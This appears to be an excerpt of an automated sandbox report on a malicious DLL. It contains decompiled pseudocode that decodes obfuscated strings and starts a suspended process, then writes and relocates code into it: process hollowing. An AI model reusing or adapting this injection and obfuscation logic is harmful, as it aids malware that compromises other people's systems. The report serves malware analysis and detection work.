				 *((char*)(_t290 - 0x92)) = 0x1c;
				 *((char*)(_t290 - 0x91)) = 0x1c;
				 *((char*)(_t290 - 0x90)) = 8;
				 *((intOrPtr*)(_t290 - 0xb0)) = 0x6e78d378;
				 *((char*)(_t290 - 0x8f)) = 0;
				E6E776510(0x6e78d378, E6E7710E2(_t290 - 0x9c)); // executed
				 *((intOrPtr*)(_t290 - 4)) = 0;
				 *((char*)(_t290 - 0x6c)) = 0x28;
				 *((char*)(_t290 - 0x6b)) = 0x7c;
				 *((char*)(_t290 - 0x6a)) = 0x69;
				 *((char*)(_t290 - 0x69)) = 0x7c;
				 *((char*)(_t290 - 0x68)) = 0x69;
				 *((char*)(_t290 - 0x67)) = 0x3f;
				 *((char*)(_t290 - 0x66)) = 6;
				 *((char*)(_t290 - 0x65)) = 0x12;
				 *((char*)(_t290 - 0x64)) = 0x10;
				 *((char*)(_t290 - 0x63)) = 0xb;
				 *((char*)(_t290 - 0x62)) = 0xb;
				 *((char*)(_t290 - 0x61)) = 0xf;
				 *((char*)(_t290 - 0x60)) = 0;
				E6E776510(0x6e78d37c, E6E7781CD(_t290 - 0x6c)); // executed
				 *((char*)(_t290 - 4)) = 1;
				 *((char*)(_t290 - 0xac)) = 0x64;
				 *((char*)(_t290 - 0xab)) = 3;
				 *((char*)(_t290 - 0xaa)) = 0x5b;
				 *((char*)(_t290 - 0xa9)) = 0x49;
				 *((char*)(_t290 - 0xa8)) = 0x68;
				 *((char*)(_t290 - 0xa7)) = 0x62;
				 *((char*)(_t290 - 0xa6)) = 0x58;
				 *((char*)(_t290 - 0xa5)) = 0x45;
				 *((char*)(_t290 - 0xa4)) = 0x78;
				 *((char*)(_t290 - 0xa3)) = 3;
				 *((char*)(_t290 - 0xa2)) = 0x1c;
				 *((char*)(_t290 - 0xa1)) = 0x1c;
				 *((char*)(_t290 - 0xa0)) = 8;
				 *((char*)(_t290 - 0x9f)) = 0;
				E6E776510(0x6e78d380, E6E7710E2(_t290 - 0xac)); // executed
				 *((char*)(_t290 - 4)) = 2;
				 *((char*)(_t290 - 0x38)) = 0x70;
				 *((char*)(_t290 - 0x37)) = 0x1c;
				 *((char*)(_t290 - 0x36)) = 0x16;
				 *((char*)(_t290 - 0x35)) = 0x58;
				 *((char*)(_t290 - 0x34)) = 0x45;
				 *((char*)(_t290 - 0x33)) = 0x78;
				 *((char*)(_t290 - 0x32)) = 3;
				 *((char*)(_t290 - 0x31)) = 0x1c;
				 *((char*)(_t290 - 0x30)) = 0x1c;
				 *((char*)(_t290 - 0x2f)) = 8;
				 *((char*)(_t290 - 0x2e)) = 0;
				E6E776510(0x6e78d384, E6E777B13(_t290 - 0x38)); // executed
				 *((char*)(_t290 - 4)) = 3;
				 *((char*)(_t290 - 0x44)) = 0x5d;
				 *((char*)(_t290 - 0x43)) = 0x35;
				 *((char*)(_t290 - 0x42)) = 3;
				 *((char*)(_t290 - 0x41)) = 0x1c;
				 *((char*)(_t290 - 0x40)) = 0x1c;
				 *((char*)(_t290 - 0x3f)) = 0x78;
				 *((char*)(_t290 - 0x3e)) = 3;
				 *((char*)(_t290 - 0x3d)) = 0x1c;
				 *((char*)(_t290 - 0x3c)) = 0x1c;
				 *((char*)(_t290 - 0x3b)) = 8;
				 *((char*)(_t290 - 0x3a)) = 0;
				E6E776510(0x6e78d388, E6E777B13(_t290 - 0x44)); // executed
				 *((char*)(_t290 - 4)) = 4;
				 *((char*)(_t290 - 0x7c)) = 0x6a;
				 *((char*)(_t290 - 0x7b)) = 0x4d;
				 *((char*)(_t290 - 0x7a)) = 0x3f;
				 *((char*)(_t290 - 0x79)) = 0xb;
				 *((char*)(_t290 - 0x78)) = 0xb;
				 *((char*)(_t290 - 0x77)) = 0x7e;
				 *((char*)(_t290 - 0x76)) = 0x4f;
				 *((char*)(_t290 - 0x75)) = 0x12;
				 *((char*)(_t290 - 0x74)) = 0x10;
				 *((char*)(_t290 - 0x73)) = 0xb;
				 *((char*)(_t290 - 0x72)) = 0xb;
				 *((char*)(_t290 - 0x71)) = 0xf;
				 *((char*)(_t290 - 0x70)) = 0;
				E6E776510(0x6e78d38c, E6E7781CD(_t290 - 0x7c)); // executed
				 *((char*)(_t290 - 4)) = 5;
				 *((char*)(_t290 - 0x50)) = 0x77;
				 *((char*)(_t290 - 0x4f)) = 0x6f;
				 *((char*)(_t290 - 0x4e)) = 0xf;
				 *((char*)(_t290 - 0x4d)) = 0x15;
				 *((char*)(_t290 - 0x4c)) = 0x68;
				 *((char*)(_t290 - 0x4b)) = 0x35;
				 *((char*)(_t290 - 0x4a)) = 0x78;
				 *((char*)(_t290 - 0x49)) = 3;
				 *((char*)(_t290 - 0x48)) = 0x1c;
				 *((char*)(_t290 - 0x47)) = 0x1c;
				 *((char*)(_t290 - 0x46)) = 8;
				 *((char*)(_t290 - 0x45)) = 0;
				E6E776510(0x6e78d390, E6E7721D5(_t290 - 0x50)); // executed
				 *((char*)(_t290 - 4)) = 6;
				 *((char*)(_t290 - 0x2c)) = 0xb;
				 *((char*)(_t290 - 0x2b)) = 0xf;
				 *((char*)(_t290 - 0x2a)) = 0x15;
				 *((char*)(_t290 - 0x29)) = 0x68;
				 *((char*)(_t290 - 0x28)) = 0x35;
				 *((char*)(_t290 - 0x27)) = 0x58;
				 *((char*)(_t290 - 0x26)) = 0x45;
				 *((char*)(_t290 - 0x25)) = 0x78;
				 *((char*)(_t290 - 0x24)) = 3;
				 *((char*)(_t290 - 0x23)) = 0x1c;
				 *((char*)(_t290 - 0x22)) = 0x1c;
				 *((char*)(_t290 - 0x21)) = 8;
				 *((char*)(_t290 - 0x20)) = 0;
				_t278 = 0x7f;
				if( *((intOrPtr*)(_t290 - 0x20)) == 0) {
					_t289 = 0;
					do {
						_t271 = 8;
						asm("cdq");
						asm("cdq");
						 *(_t290 + _t289 - 0x2c) = (_t278 + (_t271 - ( *(_t290 + _t289 - 0x2c) & 0x000000ff)) * 0x14 % _t278) % _t278;
						_t289 = _t289 + 1;
					} while (_t289 < 0xc);
					 *((char*)(_t290 - 0x20)) = 1;
				}
				E6E776510(0x6e78d394, _t290 - 0x2c); // executed
				 *((char*)(_t290 - 4)) = 7;
				 *((char*)(_t290 - 0x5c)) = 0x1e;
				 *((char*)(_t290 - 0x5b)) = 0x42;
				 *((char*)(_t290 - 0x5a)) = 0x22;
				 *((char*)(_t290 - 0x59)) = 0x49;
				 *((char*)(_t290 - 0x58)) = 0x68;
				 *((char*)(_t290 - 0x57)) = 0x62;
				 *((char*)(_t290 - 0x56)) = 0x78;
				 *((char*)(_t290 - 0x55)) = 3;
				 *((char*)(_t290 - 0x54)) = 0x1c;
				 *((char*)(_t290 - 0x53)) = 0x1c;
				 *((char*)(_t290 - 0x52)) = 8;
				 *((char*)(_t290 - 0x51)) = _t248;
				E6E776510(0x6e78d398, E6E7721D5(_t290 - 0x5c)); // executed
				 *((char*)(_t290 - 4)) = 8;
				 *((char*)(_t290 - 0x8c)) = 0x6a;
				 *((char*)(_t290 - 0x8b)) = 0x4d;
				 *((char*)(_t290 - 0x8a)) = 0xb;
				 *((char*)(_t290 - 0x89)) = 0x14;
				 *((char*)(_t290 - 0x88)) = 2;
				 *((char*)(_t290 - 0x87)) = 0x48;
				 *((char*)(_t290 - 0x86)) = 0x7c;
				 *((char*)(_t290 - 0x85)) = 0x12;
				 *((char*)(_t290 - 0x84)) = 0x10;
				 *((char*)(_t290 - 0x83)) = 0xb;
				 *((char*)(_t290 - 0x82)) = 0xb;
				 *((char*)(_t290 - 0x81)) = 0xf;
				 *((char*)(_t290 - 0x80)) = _t248;
				E6E776510(0x6e78d39c, E6E7781CD(_t290 - 0x8c)); // executed
				 *((char*)(_t290 - 4)) = 9;
				 *((char*)(_t290 - 0x1c)) = 0x49;
				 *((char*)(_t290 - 0x1b)) = 0x56;
				 *((char*)(_t290 - 0x1a)) = 0x3f;
				 *((char*)(_t290 - 0x19)) = 0x27;
				 *((char*)(_t290 - 0x18)) = 0x7e;
				 *((char*)(_t290 - 0x17)) = 0x4f;
				 *((char*)(_t290 - 0x16)) = 0x12;
				 *((char*)(_t290 - 0x15)) = 0x10;
				 *((char*)(_t290 - 0x14)) = 0xb;
				 *((char*)(_t290 - 0x13)) = 0xb;
				 *((char*)(_t290 - 0x12)) = 0xf;
				 *((char*)(_t290 - 0x11)) = _t248;
				if( *((char*)(_t290 - 0x11)) == 0) {
					do {
						_t269 = 0xf;
						asm("cdq");
						asm("cdq");
						 *(_t290 + _t248 - 0x1c) = (_t278 + (_t269 - ( *(_t290 + _t248 - 0x1c) & 0x000000ff)) * 0x1b % _t278) % _t278;
						_t248 = _t248 + 1;
					} while (_t248 < 0xb);
					 *((char*)(_t290 - 0x11)) = 1;
				}
				E6E776510(0x6e78d3a0, _t290 - 0x1c); // executed
				E6E784371();
				return 0x6e78d378;
			}









                                                      0x6e77118e
                                                      0x6e771198
                                                      0x6e77119d
                                                      0x6e7711aa
                                                      0x6e7711b6
                                                      0x6e7711bd
                                                      0x6e7711bf
                                                      0x6e7711c6
                                                      0x6e7711cd
                                                      0x6e7711d4
                                                      0x6e7711db
                                                      0x6e7711e2
                                                      0x6e7711e9
                                                      0x6e7711f0
                                                      0x6e7711f7
                                                      0x6e7711fe
                                                      0x6e77120b
                                                      0x6e771211
                                                      0x6e77121f
                                                      0x6e771224
                                                      0x6e77122a
                                                      0x6e771233
                                                      0x6e771237
                                                      0x6e77123b
                                                      0x6e77123f
                                                      0x6e771243
                                                      0x6e771247
                                                      0x6e77124b
                                                      0x6e77124f
                                                      0x6e771253
                                                      0x6e771257
                                                      0x6e77125b
                                                      0x6e771262
                                                      0x6e77126d
                                                      0x6e771272
                                                      0x6e77127c
                                                      0x6e771288
                                                      0x6e77128f
                                                      0x6e771296
                                                      0x6e77129d
                                                      0x6e7712a4
                                                      0x6e7712ab
                                                      0x6e7712b2
                                                      0x6e7712b9
                                                      0x6e7712c0
                                                      0x6e7712c7
                                                      0x6e7712ce
                                                      0x6e7712d5
                                                      0x6e7712e2
                                                      0x6e7712f0
                                                      0x6e7712f5
                                                      0x6e7712fe
                                                      0x6e771302
                                                      0x6e771306
                                                      0x6e77130a
                                                      0x6e77130e
                                                      0x6e771312
                                                      0x6e771316
                                                      0x6e77131a
                                                      0x6e77131e
                                                      0x6e771322
                                                      0x6e77132c
                                                      0x6e771337
                                                      0x6e77133c
                                                      0x6e771343
                                                      0x6e77134c
                                                      0x6e771350
                                                      0x6e771354
                                                      0x6e771358
                                                      0x6e77135c
                                                      0x6e771360
                                                      0x6e771364
                                                      0x6e771368
                                                      0x6e77136c
                                                      0x6e771373
                                                      0x6e77137e
                                                      0x6e771383
                                                      0x6e77138a
                                                      0x6e771393
                                                      0x6e771397
                                                      0x6e77139b
                                                      0x6e77139f
                                                      0x6e7713a3
                                                      0x6e7713a7
                                                      0x6e7713ab
                                                      0x6e7713af
                                                      0x6e7713b3
                                                      0x6e7713b7
                                                      0x6e7713bb
                                                      0x6e7713c2
                                                      0x6e7713cd
                                                      0x6e7713d2
                                                      0x6e7713d9
                                                      0x6e7713e2
                                                      0x6e7713e6
                                                      0x6e7713ea
                                                      0x6e7713ee
                                                      0x6e7713f2
                                                      0x6e7713f6
                                                      0x6e7713fa
                                                      0x6e7713fe
                                                      0x6e771402
                                                      0x6e771406
                                                      0x6e77140d
                                                      0x6e771418
                                                      0x6e77141d
                                                      0x6e771421
                                                      0x6e771425
                                                      0x6e771429
                                                      0x6e77142d
                                                      0x6e771431
                                                      0x6e771435
                                                      0x6e771439
                                                      0x6e77143d
                                                      0x6e771441
                                                      0x6e771445
                                                      0x6e771449
                                                      0x6e77144d
                                                      0x6e771454
                                                      0x6e771459
                                                      0x6e77145d
                                                      0x6e77145f
                                                      0x6e771461
                                                      0x6e77146a
                                                      0x6e771470
                                                      0x6e771476
                                                      0x6e771479
                                                      0x6e77147d
                                                      0x6e77147e
                                                      0x6e771483
                                                      0x6e771483
                                                      0x6e771490
                                                      0x6e771495
                                                      0x6e77149c
                                                      0x6e7714a5
                                                      0x6e7714a9
                                                      0x6e7714ad
                                                      0x6e7714b1
                                                      0x6e7714b5
                                                      0x6e7714b9
                                                      0x6e7714bd
                                                      0x6e7714c1
                                                      0x6e7714c5
                                                      0x6e7714c9
                                                      0x6e7714d0
                                                      0x6e7714db
                                                      0x6e7714e0
                                                      0x6e7714ea
                                                      0x6e7714f6
                                                      0x6e7714fd
                                                      0x6e771504
                                                      0x6e77150b
                                                      0x6e771512
                                                      0x6e771519
                                                      0x6e771520
                                                      0x6e771527
                                                      0x6e77152e
                                                      0x6e771535
                                                      0x6e77153c
                                                      0x6e771549
                                                      0x6e771554
                                                      0x6e771559
                                                      0x6e771562
                                                      0x6e771566
                                                      0x6e77156a
                                                      0x6e77156e
                                                      0x6e771572
                                                      0x6e771576
                                                      0x6e77157a
                                                      0x6e77157e
                                                      0x6e771582
                                                      0x6e771586
                                                      0x6e77158a
                                                      0x6e771591
                                                      0x6e771598
                                                      0x6e77159a
                                                      0x6e7715a3
                                                      0x6e7715a9
                                                      0x6e7715af
                                                      0x6e7715b2
                                                      0x6e7715b6
                                                      0x6e7715b7
                                                      0x6e7715bc
                                                      0x6e7715bc
                                                      0x6e7715c6
                                                      0x6e7715d0
                                                      0x6e7715d5

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E771198
                                                        • Part of subcall function 6E776510: LoadLibraryA.KERNEL32(000000A4), ref: 6E776521
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3LibraryLoad
                                                      • String ID: "$$$'$($5$5$5$?$?$?$B$B$E$E$E$E$H$I$I$I$M$M$O$O$V$X$X$X$X$[$]$b$b$d$h$h$h$h$i$i$j$j$o$p$w$x$x$x$x$x$x$x$|$|$|$~$~
                                                      • API String ID: 4010018281-2592305260
                                                      • Opcode ID: 19ab7b9eb2fff9cfc4c709209158eaa00ccce242c5ad5f68f872a7a38bcbd343
                                                      • Instruction ID: 459bf887fcf8ce6f503642a0de9ed5d200c67bd1b420cdf0feefbb805b8a2872
                                                      • Opcode Fuzzy Hash: 19ab7b9eb2fff9cfc4c709209158eaa00ccce242c5ad5f68f872a7a38bcbd343
                                                      • Instruction Fuzzy Hash: ACE1B710D482D8D9EF22C6B885587DEBFA51B27308F5844D9C5C83B293C7BA0A4DDB76
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E777BC9, Relevance: 84.4, APIs: 1, Strings: 47, Instructions: 422processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 456 6e777bc9-6e777c75 call 6e779db0 call 6e77111c 461 6e777c77-6e777c7b 456->461 462 6e777ca5-6e777ccd call 6e77657f CreateProcessA 456->462 463 6e777c7c-6e777c9a 461->463 467 6e7781b6 462->467 468 6e777cd3-6e777d00 call 6e77111c call 6e777a4b 462->468 463->463 465 6e777c9c-6e777ca0 463->465 465->462 469 6e7781b8-6e7781cc call 6e778727 467->469 476 6e777d06-6e777d26 call 6e77111c call 6e7755c2 468->476 477 6e77818a-6e7781b1 call 6e77111c call 6e7752ed call 6e77111c call 6e775523 call 6e77111c call 6e775261 468->477 485 6e777d2b-6e777d2d 476->485 477->467 485->477 487 6e777d33-6e777ddf call 6e77111c call 6e7722c8 call 6e77657f 485->487 487->477 501 6e777de5-6e777e22 call 6e77111c call 6e775720 487->501 501->477 506 6e777e28-6e777e5c call 6e77111c call 6e77566f 501->506 506->477 511 6e777e62-6e777e6e 506->511 512 6e777e70-6e777e76 511->512 513 6e777ebd-6e777ec2 511->513 514 6e777e78-6e777e7d 512->514 515 6e77810b-6e77813b call 6e77111c call 6e7757bc 513->515 516 6e777ec8-6e777ed0 513->516 518 6e777eb1-6e777ebb 514->518 519 6e777e7f-6e777ea3 call 6e77111c call 6e77566f 514->519 515->477 534 6e77813d-6e77815e call 6e77111c call 6e77585b 515->534 516->515 520 6e777ed6-6e777ede 516->520 518->513 518->514 519->477 538 6e777ea9-6e777ead 519->538 523 6e777ee2-6e777f13 520->523 524 6e777f45-6e777fcd call 6e77111c call 6e77212d call 6e77657f 523->524 525 6e777f15-6e777f19 523->525 548 6e777fcf-6e777fe3 524->548 549 6e777fee-6e77801b 524->549 528 6e777f1a-6e777f3a 525->528 528->528 532 6e777f3c-6e777f40 528->532 532->524 534->477 545 6e778160-6e778172 call 6e77111c call 6e7758fa 534->545 538->518 545->477 558 6e778174-6e778188 call 6e77111c call 6e77516c 545->558 548->523 551 6e777fe9 548->551 549->515 552 6e778021 549->552 551->515 554 6e778025-6e778045 552->554 556 6e7780ff-6e778101 554->556 557 6e77804b-6e77804e 554->557 556->554 559 6e778107 556->559 560 6e778050-6e778065 557->560 558->469 559->515 562 6e778067-6e77809e call 6e77111c call 6e7755c2 560->562 563 6e7780e4-6e7780f1 560->563 562->477 572 6e7780a4-6e7780d6 call 6e77111c call 6e77566f 562->572 563->560 567 6e7780f7-6e7780fb 563->567 567->556 572->477 577 6e7780dc-6e7780e0 572->577 577->563
                                                      C-Code - Quality: 83%
                                                      			E6E777BC9(CHAR* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr _v572;
				char _v748;
				intOrPtr _v1200;
				char _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				struct _STARTUPINFOA _v1280;
				intOrPtr _v1304;
				char _v1308;
				signed int _v1312;
				struct _PROCESS_INFORMATION _v1328;
				intOrPtr _v1332;
				char _v1335;
				char _v1336;
				char _v1337;
				char _v1338;
				char _v1339;
				char _v1340;
				char _v1341;
				char _v1342;
				char _v1343;
				char _v1344;
				char _v1345;
				char _v1346;
				char _v1347;
				char _v1348;
				char _v1349;
				char _v1350;
				char _v1351;
				char _v1352;
				char _v1353;
				char _v1354;
				char _v1355;
				char _v1356;
				char _v1371;
				char _v1372;
				char _v1373;
				char _v1374;
				char _v1375;
				char _v1376;
				char _v1377;
				char _v1378;
				char _v1379;
				char _v1380;
				char _v1381;
				char _v1382;
				char _v1383;
				signed int _v1384;
				char _v1385;
				char _v1386;
				char _v1387;
				char _v1388;
				char _v1389;
				char _v1390;
				char _v1391;
				char _v1392;
				char _v1393;
				char _v1394;
				char _v1395;
				char _v1396;
				char _v1397;
				char _v1398;
				char _v1399;
				char _v1400;
				signed short* _v1408;
				signed int _v1412;
				signed short* _v1416;
				char _v1417;
				char _v1418;
				char _v1419;
				signed int _v1420;
				char _v1421;
				char _v1422;
				char _v1423;
				char _v1424;
				unsigned int _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				signed int _v1444;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t222;
				intOrPtr _t227;
				int _t231;
				void* _t237;
				void* _t239;
				void* _t246;
				intOrPtr _t247;
				void* _t248;
				void* _t250;
				intOrPtr* _t251;
				intOrPtr _t255;
				intOrPtr _t258;
				void* _t274;
				void* _t276;
				intOrPtr* _t277;
				unsigned int _t284;
				intOrPtr _t287;
				signed int _t303;
				signed int _t313;
				CHAR* _t316;
				void* _t317;
				intOrPtr _t319;
				signed int _t320;
				void* _t328;
				void* _t329;
				char _t338;
				intOrPtr _t340;
				intOrPtr _t348;
				signed short* _t350;
				void* _t351;
				signed int _t354;
				void* _t355;
				CHAR* _t360;
				intOrPtr _t366;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t375;
				void* _t377;
				intOrPtr _t379;
				void* _t380;
				intOrPtr _t381;
				void* _t382;
				void* _t384;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t390;
				signed int _t391;

				_t361 = __edx;
				_t390 = (_t388 & 0xfffffff8) - 0x584;
				_t222 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t222 ^ _t390;
				_t366 = 0x44;
				_t374 = __edx;
				_v1384 = __edx;
				_t316 = __ecx;
				E6E779DB0(_t366,  &(_v1280.lpReserved), 0, _t366);
				_v1280.lpReserved = _t366;
				_t391 = _t390 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t227 = E6E77111C();
				_v1400 = 0x74;
				_t368 = _t227;
				_v1399 = 0x18;
				_v1398 = 0x75;
				_v1397 = 0x57;
				_v1396 = 0x27;
				_v1395 = 0x75;
				_v1394 = 0x17;
				_v1393 = 0x18;
				_v1392 = 0x41;
				_v1391 = 0x66;
				_v1390 = 0x75;
				_v1389 = 0x5f;
				_v1388 = 0x5f;
				_v1387 = 0x65;
				_v1386 = 0x3a;
				_v1385 = 0;
				if(_v1385 == 0) {
					_t360 = 0;
					_t387 = 0x7f;
					do {
						asm("cdq");
						_t313 = _t387 + (( *(_t391 + _t360 + 0x1c) & 0x000000ff) - 0x3a) * 0x22 % _t387;
						asm("cdq");
						_t361 = _t313 % _t387;
						 *(_t391 + _t360 + 0x1c) = _t313 % _t387;
						_t360 = _t360 + 1;
					} while (_t360 < 0xf);
					_t374 = _v1384;
					_v1385 = 1;
				}
				E6E77657F(_t368,  &_v1400);
				_t231 = CreateProcessA(0, _t316, 0, 0, 0, 4, 0, 0,  &_v1280,  &_v1328); // executed
				if(_t231 != 0) {
					_v1280.cb = _v1280.cb & 0x00000000;
					_t47 = E6E77111C() + 0x10; // 0x10, executed
					_t328 = _t47;
					_t237 = E6E777A4B(_t328, _t368, _v1328.hThread, 0,  &_v1308, 0,  &_v1280); // executed
					if(_t237 != 0) {
						L42:
						_t329 = E6E77111C();
						_t239 = E6E7752ED(_t329, _t368);
						_push(_t329);
						E6E775523(E6E77111C(), _t239, _v1328.hThread);
						E6E775261(E6E77111C(), _t368, _t239);
						goto L43;
					} else {
						_push(_t328);
						_t246 = E6E7755C2(E6E77111C(), _t374, _v1328.hThread, _v1304,  &_v1204, 0x1d8); // executed
						if(_t246 == 0) {
							goto L42;
						} else {
							_t247 =  *((intOrPtr*)(_t374 + 0x3c));
							_t368 = _v1200;
							_v1332 = _t247;
							_v1384 =  *(_t247 + _t374 + 6) & 0x0000ffff;
							_t248 = E6E77111C();
							_v1356 = 0x46;
							_v1355 = 0x15;
							_t377 = _t248;
							_v1354 = 0x47;
							_v1353 = 2;
							_v1352 = 0x14;
							_v1351 = 0x6d;
							_v1350 = 0x5d;
							_v1349 = 0x35;
							_v1348 = 0x5c;
							_v1347 = 0x25;
							_v1346 = 0x5e;
							_v1345 = 0x34;
							_v1344 = 0x13;
							_v1343 = 0x6b;
							_v1342 = 0x25;
							_v1341 = 0x49;
							_v1340 = 0x15;
							_v1339 = 0x5c;
							_v1338 = 0x6f;
							_v1337 = 2;
							_v1336 = 0x4d;
							_v1335 = 0;
							_t250 = E6E7722C8( &_v1356);
							_t82 = _t377 + 0x10; // 0x10
							_t251 = E6E77657F(_t82, _t250);
							_push(_v1200);
							_push(_v1328.hProcess);
							if( *_t251() != 0) {
								goto L42;
							} else {
								_t319 = _v1396;
								_t368 = _v1340;
								_v1424 = 0x3000;
								_v1388 = 0x40;
								if(E6E775720(E6E77111C(), _t368, _v1336, _v1208,  *((intOrPtr*)(_t368 + _t319 + 0x50)), _v1424, _v1388) == 0) {
									goto L42;
								} else {
									_t255 = _v1208;
									_t338 = _t255 -  *((intOrPtr*)(_t368 + _t319 + 0x34));
									_push(_t338);
									 *((intOrPtr*)(_t368 + _t319 + 0x34)) = _t255;
									_v1388 = _t338;
									if(E6E77566F(_t319, E6E77111C(), _t377, _v1336, _v1208, _t319,  *((intOrPtr*)(_t368 + _t319 + 0x54))) == 0) {
										goto L42;
									} else {
										_t340 = _v1396;
										_t258 = 0;
										_v1432 = 0;
										if(_t340 == 0) {
											L16:
											if(_v1392 == 0) {
												L38:
												_t379 =  *((intOrPtr*)(_t368 + _t319 + 0x28)) + _v1212;
												_v748 = 0x10002;
												if(E6E7757BC(E6E77111C(), _t368, _v1336,  &_v748) == 0) {
													goto L42;
												} else {
													_v572 = _t379;
													if(E6E77585B(E6E77111C(), _t368, _v1336,  &_v748) == 0 || E6E7758FA(E6E77111C(), _t368, _v1336) == 0) {
														goto L42;
													} else {
														E6E77516C(E6E77111C(), _t368, _v1336);
													}
												}
											} else {
												_v1432 = 0;
												if(_t340 != 0) {
													_v1428 = _t319 + 0xf8 + _t368;
													do {
														_v1424 = 0x12;
														_v1423 = 0x27;
														_v1422 = 0x3f;
														_v1421 = 0xb;
														_v1420 = 0x19;
														_v1419 = 0x60;
														_v1418 = 0xf;
														_v1417 = 0;
														if(_v1417 == 0) {
															_t384 = 0;
															_t320 = 0x7f;
															do {
																_t355 = 0xf;
																asm("cdq");
																_t303 = _t320 + (_t355 - ( *(_t391 + _t384 + 0x14) & 0x000000ff)) * 0x1b % _t320;
																asm("cdq");
																_t361 = _t303 % _t320;
																 *(_t391 + _t384 + 0x14) = _t303 % _t320;
																_t384 = _t384 + 1;
															} while (_t384 < 7);
															_t319 = _v1400;
															_v1417 = 1;
														}
														_t274 = E6E77111C();
														_v1388 = 0x7b;
														_v1387 = 0x6f;
														_t380 = _t274;
														_v1386 = 0x45;
														_v1385 = 0x4c;
														_v1384 = 0x35;
														_v1383 = 0x6a;
														_v1382 = 0x5a;
														_v1381 = 0x2b;
														_v1380 = 0x25;
														_v1379 = 0x40;
														_v1378 = 0x41;
														_v1377 = 0x40;
														_v1376 = 0x6a;
														_v1375 = 0x35;
														_v1374 = 0x25;
														_v1373 = 0x2a;
														_v1372 = 0xa;
														_v1371 = 0;
														_t276 = E6E77212D( &_v1388);
														_t163 = _t380 + 0x10; // 0x10
														_t277 = E6E77657F(_t163, _t276);
														_t381 = _v1432;
														_push(6);
														_push( &_v1428);
														_push(_t381);
														if( *_t277() == 6) {
															_t361 = _t368 + _t319;
															_t348 =  *((intOrPtr*)(_t368 + _t319 + 0xa4));
															_t382 = 0;
															_v1436 = _t348;
															_v1444 =  *((intOrPtr*)(_v1444 * 0x28 + _t368 + _t319 + 0x10c));
															_v1428 =  *((intOrPtr*)(_t368 + _t319 + 0xa0));
															if(_t348 != 0) {
																_t370 = _v1444;
																do {
																	_v1440 = 0;
																	_t361 = _t319 + _t382 + _t370;
																	_t382 = _t382 + 8;
																	_v1412 = _t361;
																	_t284 =  *((intOrPtr*)(_t361 + 4)) - 8 >> 1;
																	_v1428 = _t284;
																	if(_t284 != 0) {
																		_t350 = _t319 + _t382 + _t370;
																		do {
																			_t371 =  *_t350 & 0x0000ffff;
																			_t350 =  &(_t350[1]);
																			_t382 = _t382 + 2;
																			_v1408 = _t350;
																			if(_t371 < 0x1000) {
																				goto L34;
																			} else {
																				_v1312 = _v1312 & 0x00000000;
																				_push(_t350);
																				_t368 = (_t371 & 0x00000fff) +  *_t361;
																				_t351 = E6E77111C();
																				if(E6E7755C2(_t351, _t382, _v1352, _v1280.hStdInput + (_t371 & 0x00000fff) +  *_t361,  &_v1312, 4) == 0) {
																					goto L42;
																				} else {
																					_v1328.dwThreadId = _v1328.dwThreadId + _v1408;
																					_push(_t351);
																					if(E6E77566F(_t319, E6E77111C(), _t382, _v1356, _v1280.lpReserved2 + _t368,  &(_v1328.dwThreadId), 4) == 0) {
																						goto L42;
																					} else {
																						_t350 = _v1416;
																						_t361 = _v1420;
																						goto L34;
																					}
																				}
																			}
																			goto L44;
																			L34:
																			_t287 = _v1440 + 1;
																			_v1440 = _t287;
																		} while (_t287 < _v1428);
																		_t348 = _v1436;
																		_t370 = _v1444;
																	}
																	goto L36;
																	L36:
																} while (_t382 < _t348);
																_t368 = _v1356;
															}
															goto L38;
														} else {
															goto L24;
														}
														goto L44;
														L24:
														_t354 = _v1444 + 1;
														_v1440 = _t381 + 0x28;
														_v1444 = _t354;
													} while (_t354 < _v1408);
												}
												goto L38;
											}
										} else {
											_t386 = _t319 + 0x104 + _t368;
											do {
												_t361 =  *(_t386 + 8);
												if( *(_t386 + 8) == 0) {
													goto L15;
												} else {
													_push( *_t386 + _v1212);
													if(E6E77566F(_t319, E6E77111C(), _t386, _v1340,  *_t386 + _v1212, _t319 + _t361,  *((intOrPtr*)(_t386 + 4))) == 0) {
														goto L42;
													} else {
														_t258 = _v1436;
														_t340 = _v1400;
														goto L15;
													}
												}
												goto L44;
												L15:
												_t258 = _t258 + 1;
												_t386 = _t386 + 0x28;
												_v1432 = _t258;
											} while (_t258 < _t340);
											goto L16;
										}
									}
								}
							}
						}
					}
				}
				L44:
				_pop(_t369);
				_pop(_t375);
				_pop(_t317);
				return E6E778727(_t317, _v8 ^ _t391, _t361, _t369, _t375);
			}










































































































































                                                      0x6e777bc9
                                                      0x6e777bcf
                                                      0x6e777bd5
                                                      0x6e777bdc
                                                      0x6e777be8
                                                      0x6e777bf1
                                                      0x6e777bf6
                                                      0x6e777bfa
                                                      0x6e777bfc
                                                      0x6e777c01
                                                      0x6e777c0e
                                                      0x6e777c11
                                                      0x6e777c12
                                                      0x6e777c13
                                                      0x6e777c14
                                                      0x6e777c15
                                                      0x6e777c1a
                                                      0x6e777c1f
                                                      0x6e777c21
                                                      0x6e777c26
                                                      0x6e777c2b
                                                      0x6e777c30
                                                      0x6e777c35
                                                      0x6e777c3a
